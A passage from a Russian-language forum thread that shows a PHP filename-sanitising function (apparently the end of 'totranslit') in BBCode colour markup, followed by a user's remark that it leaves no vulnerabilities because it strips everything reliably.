if ([/COLOR][COLOR="#0000BB"]$punkt[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/[^a-z0-9\_\-.]+/mi"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]);
else[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/[^a-z0-9\_\-]+/mi"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'#[\-]+#i'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'-'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$lower[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_ireplace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]".php"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_ireplace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]".php"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]".ppp"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]) >[/COLOR][COLOR="#0000BB"]200[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]200[/COLOR][COLOR="#007700"]);
if( ([/COLOR][COLOR="#0000BB"]$temp_max[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strrpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'-'[/COLOR][COLOR="#007700"])) )[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$temp_max[/COLOR][COLOR="#007700"]);
}
return[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"];
}[/COLOR][/COLOR]
Там нет уязвимостей, поскольку функция totranslit всё надёжно вырезает.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
